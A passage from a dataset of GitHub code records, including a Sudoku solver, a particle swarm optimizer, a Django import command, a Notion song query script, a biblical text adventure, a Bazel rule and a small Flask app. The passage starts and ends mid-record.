default=1, help=\"Factor by which the KV heads were replicated\"\n )\n parser.add_argument(\"--config\", type=str, default=None, help=\"Config.json\")\n\n args, _ = parser.parse_known_args()\n if args.convert_from_full_model:\n convert_from_full_model(args)\n elif args.convert_to_full_model:\n convert_to_full_model(args)\n elif args.convert_from_xser:\n convert_from_xser(args)\n elif args.convert_to_xser:\n convert_to_xser(args)\n","repo_name":"aws-neuron/neuronx-distributed","sub_path":"examples/training/llama2/convert_checkpoints.py","file_name":"convert_checkpoints.py","file_ext":"py","file_size_in_byte":15263,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"51"} +{"seq_id":"4604918164","text":"import time\n\nboard = [ # Sudoku Board\n [9,0,0,0,0,0,5,1,0], # 1\n [0,7,0,0,8,0,0,0,9], # 2\n [5,0,0,1,0,9,2,7,8], # 3\n [2,5,0,0,0,7,8,0,1], # 4\n [1,0,0,0,5,0,0,0,0], # 5\n [3,0,0,0,9,0,0,0,0], # 6\n [0,0,0,3,1,5,0,4,0], # 7\n [0,0,0,0,0,0,0,0,0], # 8\n [7,1,4,0,2,0,0,8,0] # 9\n]\n \ndef displayBoard(board):\n \"\"\"\n prints the board\n :parameter board: 2d list of integers\n :return: None\n \"\"\"\n\n for i in range(len(board)): # rows\n if i % 3 == 0 and i != 0: # when i is divisible by 3 and when i is not 0\n print(\"-------------------------\") # horiontal lines\n\n for j in range(len(board[0])): # columns\n if j % 3 == 0 and j != 0: # when j is divisible by 3 and when j is not 0\n print(\" | \"+ ' ', end = '') # vertical lines (end = '' is used to not end with newline (\\n))\n\n if j == 8: # last value in row\n print(board[i][j])\n else:\n print(str(board[i][j]) + ' ', end = '') # str is so we can add the space\n\ndef findZero(board):\n \"\"\"\n finds a zero in the board\n :parameter board: partially complete board\n :return: (integer, integer) row column\n \"\"\"\n\n for row in range(len(board)):\n for column in range(len(board[0])):\n if board[row][column] == 0: \n return(row, column) # row, column\n\n return None # needed since otherwise wil return position of zero\n\ndef validNumber(board, number, position):\n \"\"\"\n checks if number is valid in board\n :parameter board: 2d list of integers\n :parameter number: integer\n :parameter position: position of number (row, column)\n :return: bool\n \"\"\"\n\n # First check row\n for i in range(9):\n if board[position[0]][i] == number and i != position[1]: # check if equal in row and not position we just entered number\n return False\n\n # Then check column\n for i in range(9):\n if board[i][position[1]] == number and i != position[0]: # check if equal in column and not position we just entered number\n return False\n\n # Finally, check square\n square_x = position[1] // 3 # floor division (will give 0, 1, or 2)\n square_y = position[0] // 3 # floor division (will give 0, 1, or 2)\n\n for i in range(square_y * 3, square_y * 3 + 3): # from beginning to end of square row\n for j in range(square_x * 3, square_x * 3 + 3): # from beginning to end of square column\n if board[i][j] == number and (i, j) != position:\n return False\n\n return True # if all 3 tests do not return false, return true since number is valid\n\ndef solver(board):\n \"\"\"\n solves sudoku board using backtracking\n :parameter board: 2d list of integers\n :return: solution\n \"\"\"\n\n # Base case of recusion, checks if any zeroes are left\n find = findZero(board) # checks for zeroes\n if find != None: # found zero\n row, column = find # find is a tuple e.g. (x, y)\n else: # no zeroes left; find is none\n return True # board is done\n\n for number in range(1,10): # tries numbers 1 to 9\n if validNumber(board, number, (row, column)) is True: # if number valid\n board[row][column] = number # inserts number\n\n if solver(board) is True: # if no zeroes left\n return True # board is solved\n\n else: # zeroes found\n board[row][column] = 0 # board not solved, reset number to zero \n continue\n \n else: # if number not valid\n continue\n\nif __name__ == \"__main__\":\n print(\"Unsolved Board\")\n displayBoard(board)\n\n startTime = time.time()\n\n solver(board)\n\n elapsedTime = time.time() - startTime\n elapsedTime = str(round(elapsedTime, 4))\n\n print(\"\")\n print(\"Solved Board\")\n displayBoard(board)\n\n print(\"\")\n print(\"Time elapsed: \", elapsedTime, \" seconds\")\n","repo_name":"TimDemetriades/PythonSudokuSolver","sub_path":"SudokuSolver.py","file_name":"SudokuSolver.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"8272200499","text":"import os\r\nimport argparse\r\nfrom MathGraph import MathGraph\r\nfrom File import File\r\nfrom path import path\r\n\r\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files/Graphviz/bin/'\r\n\r\nparser = argparse.ArgumentParser(description = 'MathGraph')\r\nparser.add_argument('-r', '--read', dest = 'read', type = str, help = \"read the Graph\")\r\nparser.add_argument('-s', '--save', dest = 'save', type = str, help = \"save the Graph\")\r\nparser.add_argument('-n', '--new', dest = 'new', type = str, help = \"create new Graph\")\r\nparser.add_argument('-ade', '--addedge', dest = 'addedge', type = str, help = 'add a new edge')\r\nparser.add_argument('-adv', '--addvertex', dest = 'addvertex', type = str, help = 'add a new vertex')\r\nparser.add_argument('-dle', '--deleteedge', dest = 'deleteedge', type = str, help = 'delete an edge')\r\nparser.add_argument('-dlv', '--deletevertex', dest = 'deletevertex', type = str, help = 'delete a vertex')\r\nparser.add_argument('-sv', '--searchvertex', dest = 'searchvertex', type = str, help = 'search all the vertex on the Graph')\r\nparser.add_argument('-se', '--searchedge', dest = 'searchedge', type = str, help = 'search all the edges on the Graph')\r\nparser.add_argument('-sl', '--searchlatter', dest = 'searchlatter', type = str, help = 'search all the vertex the point can go to')\r\nparser.add_argument('-sbf', '--searchbefore', dest = 'searchbefore', type = str, help = 'search all the vertex that can go to the point')\r\nparser.add_argument('-spth', '--searchpath', dest = 'searchpath', type = str, help = 'search the path contains the point')\r\nargs = parser.parse_args()\r\n\r\nwhile True:\r\n action = input('请输入您的操作:')\r\n if action == 'read':\r\n fileName = input('请输入您的文件名:')\r\n g = MathGraph()\r\n print (fileName)\r\n g.read(fileName)\r\n g.turn(fileName)\r\n print(path(g))\r\n continue\r\n\r\n if action == 'save':\r\n fileName = input('请输入您的文件名:')\r\n g.save(fileName)\r\n break\r\n\r\n if action == 'new':\r\n fileName = input('请输入您的文件名:')\r\n file = File(fileName)\r\n file.create()\r\n g = MathGraph()\r\n print (fileName)\r\n continue\r\n\r\n if action == 'addedge':\r\n string = input('请输入您的边名或者节点名:')\r\n g.addEdge(string[0], string[1])\r\n continue\r\n\r\n if action == 'addvertex':\r\n string = input('请输入您的边名或者节点名:')\r\n g.addVertex(string)\r\n continue\r\n\r\n if action == 'deleteedge':\r\n string = input('请输入您的边名或者节点名:')\r\n if g.dict2[string[1]] in g.connection[g.dict2[string[0]]]:\r\n g.connection[g.dict2[string[0]]].remove(g.dict2[string[1]])\r\n else:\r\n print('edge不存在')\r\n continue\r\n\r\n if action == 'deletevertex':\r\n string = input('请输入您的边名或者节点名:')\r\n if string in g.dict2:\r\n del g.connection[g.dict2[string]]\r\n for m in range(len(g.connection)):\r\n for n in g.connection[m]:\r\n if g.dict2[string] in g.connection[m]:\r\n g.connection[m].remove(g.dict2[string])\r\n g.dict1.pop(g.dict2[string])\r\n print(g.dict1)\r\n l1 = g.dict1.values()\r\n print(l1)\r\n l2 = list(range(len(g.dict1)))\r\n print(l2)\r\n g.dict1 = dict(zip(l2,l1))\r\n print(g.dict1)\r\n g.dict2 = dict(zip(l1,l2))\r\n print(g.dict2)\r\n else:\r\n print('vertex不存在')\r\n continue\r\n\r\n if action == 'searchvertex':\r\n fileName = input('请输入您的文件名:')\r\n f = MathGraph()\r\n f.read(fileName)\r\n print (f.dict2.keys())\r\n continue\r\n\r\n if action == 'searchedge':\r\n fileName = input('请输入您的文件名:')\r\n f = MathGraph()\r\n f.read(fileName)\r\n l = []\r\n for m in range(len(f.connection)):\r\n for n in f.connection[m]:\r\n l.append(f.dict1[m] + f.dict1[n])\r\n print(l)\r\n continue\r\n\r\n\r\n if action == 'searchlatter':\r\n string = input('请输入您的边名或者节点名:')\r\n print (g.exists_path_to(g.dict2[string]))\r\n continue\r\n\r\n if action == 'searchbefore':\r\n string = input('请输入您的边名或者节点名:')\r\n v = []\r\n for n in g.dict1:\r\n if g.dict2[string] in g.exists_path_to(n):\r\n v.append(g.dict1[n])\r\n print (v)\r\n continue\r\n\r\n if action == 'searchpath':\r\n string = input('请输入您的边名或者节点名:')\r\n v = []\r\n for n in g.dict1:\r\n if g.dict2[string] in g.exists_path_to(n):\r\n v.append(g.dict1[n])\r\n print ('后置节点:' + str(g.exists_path_to(g.dict2[string])) + '\\n前置节点:' + str(v))\r\n continue\r\n\r\n else:\r\n print ('您的操作不存在,请重新输入')\r\n continue\r\n","repo_name":"TimeSea22/MathGraph","sub_path":"cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35041670938","text":"import numpy as np\nfrom subprocess import Popen, PIPE\nimport time\nfrom datetime import date\nfrom os.path import exists\nfrom random import sample\nimport random\n\ndef calculateCost(fitness, P, popSize, lb, ub, process, CORNOT):\n \"\"\"\n It calculates the fitness value of each individual in the population\n\n Parameters\n ----------\n fitness : function\n The objective function selected\n P : list\n The list of individuals\n popSize : int\n Number of chrmosomes in a population\n lb : list\n lower bound limit list\n ub : list\n upper bound limit list\n process : Popen\n The subprocess taht calculate the cost\n CORNOT : bool\n Use the C++ subprocess or not\n\n Returns\n -------\n list\n scores : fitness values of all individuals in teh population\n \"\"\"\n scores = np.full(popSize, 0.0)\n for i in range(0, popSize):\n P[i] = np.clip(P[i], lb, ub)\n if CORNOT == True:\n scores[i] = fitness(process, P[i, :])\n if scores[i] == 3:\n print(P[i, :])\n print(stdoutreadint(process))\n print(stdoutreadint(process))\n print(stdoutreadint(process))\n exit()\n else:\n scores[i] = fitness(P[i, :])\n return scores\n\ndef PSO(fitness, bound, dim, popSize, iters, CORNOT, best, formulaID, record = False, dataset_size = 0, SHOWBEST = False):\n \"\"\"\n This is the main method which implements PSO\n\n Parameters\n ----------\n fitness : function\n The function/subprocess that return the fitness\n bound : list of list\n The bound limit lists of each dimensions\n dim : int\n The dimension of the individuals\n popSize : int\n Number of chrmosomes in a population\n iters : int\n Number of iterations / generations of PSO\n CORNOT : bool\n True for use C++ subprocess\n best : float\n The best score during the whole experiment\n formulaID : int\n The formula ID will be trained\n record : bool\n True for record every population and the fitness to ./result/yyyy/mmdd_formulaXX_dataset_size_XX_version\n dataset_size: int\n The dataset size for record\n \"\"\"\n\n\n start_time = time.time()\n\n c1_max = 2.5\n c2_max = 2.5\n c1_min = 2.5\n c2_min = 2.5\n wMax = 0.9\n wMin = 0.4\n Vmax = 4\n process = Popen(['./test', str(formulaID)], stdin=PIPE, stdout=PIPE)\n print(\"c1 = \", c1_min, \"~\", c1_max, \"\\nc2 = \", c2_min, \"~\", c2_max, \"\\nw = \", wMin, \"~\", wMax, \"\\nVmax = \", Vmax)\n\n ub = [max(x) for x in bound]\n lb = [min(x) for x in bound]\n\n print(\"upper bound:\", ub)\n print(\"lower bound:\", lb)\n\n gBest_corr = 0\n gBest_sm = [0 for x in range(dim)]\n pBest_corr = [0 for x in range(popSize)]\n pBest_sm = [[0 for x in range(dim)] for y in range(popSize)]\n vel = [[0 for x in range(dim)] for y in range(popSize)]\n\n# P = np.array([[np.random.choice(x) for x in bound] for i in range(popSize)])\n P = np.zeros((popSize, dim))\n for i in range(dim):\n P[:, i] = np.random.uniform(0, 1, popSize) * (ub[i] - lb[i]) + lb[i]\n pfitness = calculateCost(fitness, P, popSize, lb, ub, process, CORNOT)\n print(\"PSO is optimizing \\\"\" + fitness.__name__ + \"\\\"\")\n if record == True:\n year, month, day = date.today().isoformat.split(\"-\")\n i = 1\n record_filename = \"result/\" + year + \"/\" + month + day + \"_formula\" + str(formulaID) + \"_size_\" + str(dataset_size) + \"_\" + str(i)\n while exists(record_filename):\n record_filename = \"result/\" + year + \"/\" + month + day + \"_formula\" + str(formulaID) + \"_size_\" + str(dataset_size) + \"_\" + str(i)\n i = i + 1\n f = open(record_filename, \"w\")\n print(\"Record to \" + record_filename)\n\n\n for i in range(iters):\n # record the global best and local best of each individuals\n for popu in range(popSize):\n if pfitness[popu] > pBest_corr[popu]:\n pBest_corr[popu] = pfitness[popu]\n pBest_sm[popu] = P[popu]\n if pfitness[popu] > gBest_corr:\n gBest_corr = pfitness[popu]\n gBest_sm = P[popu]\n # update the W, c1, c2 of PSO\n w = wMax - (wMax - wMin) * i / iters\n c1 = c1_max + ((c1_min - c1_max) / iters) * i\n c2 = c2_min + ((c2_max - c2_min) / iters) * i\n # update the velocity and the direction of each individuals\n for popu in range(popSize):\n # load curren popu\n current_fitness = pfitness[popu]\n current_sm = P[popu]\n\n r1 = random.random()\n r2 = random.random()\n\n # update popu vel and position\n temp_new_sm = [0 for x in range(dim)]\n\n for d in range(dim):\n vel[popu][d] = round(w * vel[popu][d] + c1 * r1 * (pBest_sm[popu][d] -\n current_sm[d]) + c2 * r2 * (gBest_sm[d] - current_sm[d]))\n\n if vel[popu][d] > Vmax:\n vel[popu][d] = Vmax\n\n if vel[popu][d] < -Vmax:\n vel[popu][d] = -Vmax\n\n current_sm[d] = current_sm[d] + vel[popu][d]\n # calculate fitness of each individuals\n pfitness = calculateCost(fitness, P, popSize, lb, ub, process, CORNOT)\n # if record is setting, record the individuals and their fitness\n if record == True:\n for p in range(len(P)):\n for pop in P[p]:\n f.write(str(pop) + ' ')\n f.write(str(pfitness[i]) + '\\n')\n # if SHOWBEST is setting, print the best fitness\n bestScore = max(pfitness)\n bestID = np.argmax(pfitness)\n best_sm = P[bestID]\n if bestScore < gBest_corr:\n bestScore = gBest_corr\n best_sm = gBest_sm\n if SHOWBEST == True:\n print(['At iteration ' + str(i + 1) + ' the best fitness is ' + str(bestScore)])\n\n # print the best fitness of whole iterations\n print(\"bestScore = \", bestScore)\n for i in best_sm:\n print(\"{:.5g}\".format(i), end = \" \")\n print(\"\")\n # print the time that iters used\n print(\"Cost\", time.time() - start_time, \"seconds\")\n print(\"-------------------------------------\")\n # if record is setting, close the file operation\n if record == True:\n f.close()\n # return the [best fitness, best individual]\n return [bestScore, best_sm]\n\n\n\n\n\ndef printbestIndividual(ans):\n l = []\n for i in ans:\n l.append(round(i, 4))\n print('HCP[1]:%.4g'%4)\n print('HCP[2-8]:%.4g'%l[0])\n print('HCP[9-10]:%.4g'%l[1])\n print('HCP[11]:%.4g'%l[2])\n print('HCP[12]:%.4g'%l[3])\n print('HCP[13]:%.4g'%l[4])\n for i in range(5, len(l), 2):\n print(\"{:.4g} {:.4g}\".format(l[i], l[i + 1]))\n\n\ndef stdoutreadint(process):\n ret = process.stdout.readline()\n try:\n return float(str(ret)[2:-3])\n except:\n return str(ret)\n return float(str(ret)[2:-3])\n\ndef listtostdin(l):\n s = str(l[0])\n for i in l[1:]:\n s += \" \" + str(i)\n s += \"\\n\"\n return s\n\ndef ObjfCorr(P, l):\n s = listtostdin(l)\n P.stdin.write(s.encode())\n P.stdin.flush()\n return stdoutreadint(P)\n\n\n\n","repo_name":"zoo868e/bridge","sub_path":"Gameinfo/PTd.py","file_name":"PTd.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10475022668","text":"from django.core.management.base import BaseCommand, CommandError\nfrom pyp.models import *\nfrom django.shortcuts import get_object_or_404\n\nclass Command(BaseCommand):\n help = 'Closes the specified poll for voting'\n\n def handle(self, *args, **options):\n file1 = open(\"faculty.txt\", \"r\")\n for f in file1:\n f=f.strip()\n f=f.split(\" \", 1)\n if Faculty.objects.filter(faculty_code=f[0].strip()):\n continue\n else:\n test = Faculty(faculty_text=f[1].strip(),faculty_code=f[0].strip())\n test.save()\n self.stdout.write(self.style.SUCCESS('added ' + f[1]))\n\n lis=[['Electrical Engineering', 'EE'],\n ['Civil and Environment Engineering', 'CE'],\n ['Mechanical Engineering', 'ME'],\n ['Biomedical Engineering', 'BN'],\n ['Chemical Engineering', 'CN'],\n ['Materials Science Engineering', 'MLE'],\n ['Mathematics and Applied Mathematics', 'MA'],\n ['Statistics and Applied Statistics', 'ST'],\n ['Chemistry', 'CM'],\n ['Physics', 'PC'],\n ['Economics','EC'],\n ['Life Sciences', 'LSM', 'LSE'],\n ['Pharmacy', 'PR'],\n ['Computational Biology', 'BL'],\n ['Psychology', 'PL'],\n ['Geography', 'GE'],\n ['History', 'HY'],\n ['Japanese Studies', 'JS'],\n ['Chinese Studies', 'CH'],\n ['Sociology', 'SC'],\n ['Philosophy', 'PH'],\n ['Global Studies', 'GL'],\n ['Social Work', 'SW'],\n ['Political Science', 'PS'],\n ['Communicatons and New Media', 'NM'],\n ['School of Business', 'ACC','DSC'],\n ['School Of Computing', 'CS', 'IS', 'BA', 'BT'],\n ['School of Law', 'LC', 'LL']\n ]\n file2=open(\"module.txt\",\"r\")\n for f in file2:\n f=f.strip()\n f=f.split(\" \",1)\n fcode=f[0]\n counter=0\n if fcode[2].isdigit():\n fcode = fcode[0:2]\n else:\n fcode = fcode [0:3]\n done=False\n if Module.objects.filter(module_code=f[0].strip()):\n self.stdout.write(\"already add \"+f[0])\n\n continue;\n for codes in lis:\n for code in codes[1:]:\n if fcode==code:\n print(codes[0])\n\n faculty=get_object_or_404(Faculty,faculty_text=codes[0].strip())\n module=faculty.module_set.create(module_text=f[1],module_code=f[0])\n done =True\n x = 2018\n for count in range(0, 3):\n module.moduleyear_set.create(year=str(x - count) + \"Sem2\")\n module.moduleyear_set.create(year=str(x - count) + \"Sem1\")\n break;\n if done:\n break;\n if done:\n self.stdout.write(self.style.SUCCESS('added '+ f[0]+ \" \"+f[1]))\n else:\n self.stdout.write(\"unable to add \"+f[0])\n","repo_name":"chanqingzhou/forum","sub_path":"myforum/pyp/management/commands/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"22053046293","text":"import glob, os\nfrom multiprocessing.dummy import Pool as ThreadPool\n\ndef ab(i):\n print(f\"starting thread {i}\")\n os.system(f\"source ~/modeltraining/bin/activate && export PYTHONPATH=$PYTHONPATH:~/AnimeGANv2/tools:~/AnimeGANv2:~/modeltraining/lib/python3.8/site-packages && cd ~/AnimeGANv2/tools && python ~/AnimeGANv2/tools/edge_smooth.py --dataset L{i}\")\n print(f\"thread {i} done\")\n\nt =[]\n\nfor j in range (1,13):\n t.append(j)\n\npool = ThreadPool(12)\nblurring = pool.map(ab,t)\npool.close()\npool.join()","repo_name":"Allen050329/handy-tools","sub_path":"blur-mt.py","file_name":"blur-mt.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13795141761","text":"from notion_client import Client\nimport os\n\n# Script will query notion for 100 songs with the highest rating and output them to a specified file\n\n# ------------------------ SET UP ------------------------\n# You need to create a Notion Integration and share your database with that integration\n# the secret integration token from Notion Integration\nnotion_token = ''\n\n# the database id of your notion songs database\n# get the mess of numbers after the \"/\" and before the \"?\" on your dashboard URL (no need to split into dashes)\ndatabase_id = ''\n\n# absolute path to the desired output file (must also include the file name and extension)\nsong_list_path = ''\n\n# ------------------------ END SET UP ------------------------\n\nos.environ['notion_token'] = notion_token\nnotion = Client(auth=os.environ['notion_token'])\n\n\n# queries top 100 songs from rating S to 3 stars\nmy_page = notion.databases.query(\n **{\n \"database_id\": database_id,\n \"sorts\": [\n {\n \"property\": \"Rating\",\n \"direction\": \"descending\"\n }\n ]\n\n }\n)\n\nresult_list1 = my_page['results']\ntitle_array = []\n\nfor song in result_list1:\n title = ''\n\n try:\n title = song['properties']['Name']['title'][0]['text']['content']\n except:\n title = 'no name'\n\n title_array.append(title)\n\ntitle_array = list(dict.fromkeys(title_array))\n\nwith open(song_list_path, 'w') as f:\n for title in title_array:\n f.write(title + \"\\n\")\n \n","repo_name":"AlexShen101/Notion_YT_Player","sub_path":"Query_Notion_Songs/get_songs_from_notion.py","file_name":"get_songs_from_notion.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"70829429279","text":"# coding:utf-8\n# Created by Equator at 2020/3/25\n# 闭包\ndef count():\n fs = []\n for i in range(1, 4):\n def f():\n return i * i\n\n fs.append(f)\n return fs\n\n\n# f1、f2、f3分别对应了fs这个list的三个元素\nf1, f2, f3 = count()\nprint(f1())\nprint(isinstance(f2(), int))\n","repo_name":"libinkai/BookmarkSharer","sub_path":"learn/closureTest.py","file_name":"closureTest.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"29026352041","text":"# 앞의 3 경우를 더하는데 같은 수 연속을 피하기 위해 1로 끝난 경우는 2, 3으로 끝난 경우를 더해주는 식으로 2차원 배열을 이용하여 구함\nimport sys\ninput = sys.stdin.readline\nT = int(input())\nmod = 1000000009\ndp = [[0] * 4 for _ in range(100001)]\ndp[1] = [0, 1, 0, 0]\ndp[2] = [0, 0, 1, 0]\ndp[3] = [0, 1, 1, 1]\nfor i in range(4, 100001):\n for j in range(1, 4):\n dp[i][j] = (dp[i-j][1] + dp[i-j][2] + dp[i-j][3] - dp[i-j][j]) % mod\nfor _ in range(T):\n n = int(input())\n print(sum(dp[n]) % mod)\n","repo_name":"yyysolhhh/Python_Algorithm","sub_path":"baekjoon/BJ_15990.py","file_name":"BJ_15990.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41172619333","text":"# Justin Burkhalter\n\nprint(\"You have just become a Christian and need to get to the eternal life but satan stands in your way. You need to defeat satan before getting eternal salvation, but before you will need to put on the full armor of God. You will need the breastplate of righteousness to protect you from every spiritual attack, shield of faith to put your personal trust in God, the helmet of salvation to protect your mind, the sword of the Spirit to bring truth and freedom to you, the belt of truth to put your trust in God’s truth, and finally the gospel of peace sandals to take the message of God’s peace to the people around you.\")\n\n# Function showing the goal of the game and move commands\n\n\ndef show_instructions():\n # print a main menu and the commands\n # Add later type 'exit' to exit\n print(\"Move commands: go South, go North, go East, go West\")\n print(\"Add to Inventory: get 'item name'\")\n\n\n# A dictionary for the eternal life text game\n# The dictionary links a room to other rooms.\nrooms = {\n \"Jerusalem\": {'South': 'Cenacle', 'item': 'Sword of the Spirit', 'North': 'Golgotha', 'item': 'Helmet of Salvation', 'West': 'Rome', 'item': 'Shield of Faith', 'East': 'Praetorium', 'item': \"Breastplate of Righteousness\"},\n 'Cenacle': {'North': 'Jerusalem', 'East': 'Nazareth', 'item': 'Gospel of Peace Sandals'},\n 'Nazareth': {'West': 'Cenacle', 'item': 'Sword of the Spirit'},\n 'Rome': {'East': 'Jerusalem', },\n 'Golgotha': {'East': 'Gethsemane', 'item': 'Belt of Truth', 'South': 'Jerusalem'},\n 'Gethsemane': {'West': 'Golgotha', 'item': 'Helmet of Salvation'},\n 'Praetorium': {'West': 'Jerusalem', 'North': 'Eternal Life', 'item': 'satan'},\n 'Eternal Life': {'South': 'Praetorium', 'item': 'Breastplate of Righteousness'}\n # add more rooms and directions here\n}\n\n\n# Show the players status by identifying the room they are currently in\n# showing a list of their inventory of items, and displaying the item in their current room.\ndef show_status(inventory, current_room):\n print(\"Inventory\", inventory)\n print(\"You are in the\", current_room)\n item = rooms[current_room].get('item')\n if item not in inventory:\n print(\"You see the\", item)\n\n\ndef main():\n directions = ('go South', 'go North', 'go East', 'go West')\n inventory = [] # list to add the items\n current_room = \"Jerusalem\" # starting room\n show_instructions() # print main game instructions\n\n while True: # unless user enters Exit, the loop will run\n\n # show instructions and status\n show_status(inventory, current_room)\n\n # reads user input like go South etc\n user_input = input(\"\\nEnter your move: \")\n if user_input.lower() == 'exit':\n print(\"Thanks for playing\")\n break # exit\n\n # breaks the user input to remove word 'go'\n user_input = user_input.strip().split(' ', 1)\n if len(user_input) > 1: # If statement that checks the length of x\n action = user_input[0]\n object = user_input[1]\n else:\n print(\"Invalid input\")\n continue\n\n valid_objects = rooms[current_room].keys()\n if action == 'go':\n dir = object.capitalize()\n if dir in valid_objects: # if the given room has this direction, continue\n # change the start_room after moving\n current_room = rooms[current_room][dir]\n print(\"You enter the\", current_room)\n\n else:\n # if direction is not present for current_room in rooms dictionary,\n print('Invalid direction!')\n\n elif action == 'get':\n item = rooms[current_room].get('item')\n if item not in inventory:\n inventory.append(item) # add the item to the inventory\n # remove it from the current room\n rooms[current_room][item] = None\n else:\n print(\"You already have the\", item)\n else:\n print(\"Invalid input\")\n\n if current_room == '':\n if len(inventory) == 6:\n print(\"win\")\n else:\n print(\"lose\")\n break # if you win/lose, then you dont want to ask for input again at the start of the loop\n\n\nmain() # go!\n","repo_name":"JB0610/EternalLifeGame","sub_path":"TextBasedGame.py","file_name":"TextBasedGame.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"74608019037","text":"load(\"@bazel_skylib//lib:dicts.bzl\", \"dicts\")\nload(\"//lib:apple_support.bzl\", \"apple_support\")\nload(\"//lib:lipo.bzl\", \"lipo\")\nload(\"//lib:transitions.bzl\", \"macos_universal_transition\")\n\ndef _universal_binary_impl(ctx):\n inputs = [\n binary.files.to_list()[0]\n for binary in ctx.split_attr.binary.values()\n ]\n\n if not inputs:\n fail(\"Target (%s) `binary` label ('%s') does not provide any \" +\n \"file for universal binary\" % (ctx.attr.name, ctx.attr.binary))\n\n output = ctx.actions.declare_file(ctx.label.name)\n\n if len(inputs) > 1:\n lipo.create(\n actions = ctx.actions,\n apple_fragment = ctx.fragments.apple,\n inputs = inputs,\n output = output,\n xcode_config = ctx.attr._xcode_config[apple_common.XcodeVersionConfig],\n )\n\n else:\n # If the transition doesn't split, this is building for a non-macOS\n # target, so just create a symbolic link of the input binary.\n ctx.actions.symlink(target_file = inputs[0], output = output)\n\n runfiles = ctx.runfiles(files = ctx.files.binary)\n transitive_runfiles = [\n binary[DefaultInfo].default_runfiles\n for binary in ctx.split_attr.binary.values()\n ]\n runfiles = runfiles.merge_all(transitive_runfiles)\n\n return [\n DefaultInfo(\n executable = output,\n files = depset([output]),\n runfiles = runfiles,\n ),\n ]\n\nuniversal_binary = rule(\n attrs = dicts.add(\n apple_support.action_required_attrs(),\n {\n \"binary\": attr.label(\n cfg = macos_universal_transition,\n doc = \"Target to generate a 'fat' binary from.\",\n mandatory = True,\n ),\n \"_allowlist_function_transition\": attr.label(\n default = \"@bazel_tools//tools/allowlists/function_transition_allowlist\",\n ),\n },\n ),\n doc = \"\"\"\nThis rule produces a multi-architecture (\"fat\") binary targeting Apple macOS\nplatforms *regardless* of the architecture of the macOS host platform. The\n`lipo` tool is used to combine built binaries of multiple architectures. For\nnon-macOS platforms, this simply just creates a symbolic link of the input\nbinary.\n\"\"\",\n executable = True,\n fragments = [\"apple\"],\n implementation = _universal_binary_impl,\n)\n","repo_name":"bazelbuild/apple_support","sub_path":"rules/universal_binary.bzl","file_name":"universal_binary.bzl","file_ext":"bzl","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"51"} +{"seq_id":"35682310624","text":"import pika, sys, os, wikipedia, pageviewapi.period\r\n\r\ndef main():\r\n\r\n #Conexión al servidor RabbitMQ \r\n connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\r\n channel = connection.channel()\r\n\r\n #Nos aseguramos que existe una cola\r\n channel.queue_declare(queue='WikipediaVisitas')\r\n\r\n def callback(ch, method, properties, body):\r\n count = pageviewapi.period.sum_last(\"en.wikipedia\", body.decode(), last=365) #observamos la cantidad de visitas que tuvo la busqueda\r\n #Seteado en wikipedia ingles debido a problemas al probar la API\r\n \r\n #count = 10 # limpieza de cola\r\n\r\n #Imprimimos la cantidad de visitas\r\n print(\" [x] Received %r\" % body +\". las consultas para este termino en los ultimos dias son: \" + str(count))\r\n\r\n # Se consume la consulta en rabbitMQ\r\n channel.basic_consume(queue='WikipediaVisitas', on_message_callback=callback, auto_ack=True)\r\n\r\n print(' [*] Waiting for messages. To exit press CTRL+C')\r\n channel.start_consuming()\r\n\r\n\r\n #Bocle infinita\r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except KeyboardInterrupt:\r\n print('Interrupted')\r\n try:\r\n sys.exit(0)\r\n except SystemExit:\r\n os._exit(0)","repo_name":"WsDoragon/INFO229","sub_path":"Tutorial3/consumerVisitas.py","file_name":"consumerVisitas.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34894837293","text":"from flask import Flask, request, render_template\nimport random\n\napp = Flask(__name__)\n\ndef sort_letters(message):\n \"\"\"A helper method to sort the characters of a string in alphabetical order\n and return the new string.\"\"\"\n return ''.join(sorted(list(message)))\n\n\n@app.route('/')\ndef homepage():\n \"\"\"A homepage with handy links for your convenience.\"\"\"\n return render_template('home.html')\n\n@app.route('/froyo')\ndef choose_froyo():\n \"\"\"Shows a form to collect the user's Fro-Yo order.\"\"\"\n return render_template('froyo_form.html')\n # Below is the previous version of this function\n # \n # return \"\"\"\n #
\n # What is your favorite Fro-Yo flavor?
\n #
\n # What are your favorite Fro-Yo toppings?
\n #
\n # \n #
